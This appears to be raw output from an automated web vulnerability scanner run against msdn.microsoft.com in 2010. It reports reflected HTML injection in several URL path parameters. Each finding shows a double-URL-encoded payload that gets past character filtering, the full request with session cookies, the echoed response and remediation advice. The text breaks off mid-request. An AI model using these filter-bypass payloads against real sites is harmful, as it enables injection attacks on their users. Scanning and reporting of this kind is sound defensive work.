HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:47 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582939(office.11e1089"><a>1aa87e60d4f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80778%2522%253e%253ca%253e591d660c3c3 was submitted in the REST URL parameter 1. This input was echoed as 80778"><a>591d660c3c3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us80778%2522%253e%253ca%253e591d660c3c3/library/dd582939(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:09 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us80778"><a>591d660c3c3/library/dd582939(office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a19f7%2522%253e%253ca%253e3cb7c16355f was submitted in the REST URL parameter 2. This input was echoed as a19f7"><a>3cb7c16355f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya19f7%2522%253e%253ca%253e3cb7c16355f/dd582939(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya19f7"><a>3cb7c16355f/dd582939(office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecd%2522%253e%253ca%253eadfdc378508 was submitted in the REST URL parameter 3. This input was echoed as ebecd"><a>adfdc378508 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582939(office.11).aspxebecd%2522%253e%253ca%253eadfdc378508 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9231 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582939(office.11).aspxebecd"><a>adfdc378508" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67864%2522%253e%253ca%253ecad7ddbae4c was submitted in the REST URL parameter 1. This input was echoed as 67864"><a>cad7ddbae4c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us67864%2522%253e%253ca%253ecad7ddbae4c/library/dd582940(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9220 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us67864"><a>cad7ddbae4c/library/dd582940(office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6921d%2522%253e%253ca%253e979c28d57ca was submitted in the REST URL parameter 2. This input was echoed as 6921d"><a>979c28d57ca in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6921d%2522%253e%253ca%253e979c28d57ca/dd582940(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6921d"><a>979c28d57ca/dd582940(office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a8e%2522%253e%253ca%253edc8afda3d17 was submitted in the REST URL parameter 3. This input was echoed as 54a8e"><a>dc8afda3d17 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582940(office.1154a8e%2522%253e%253ca%253edc8afda3d17 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 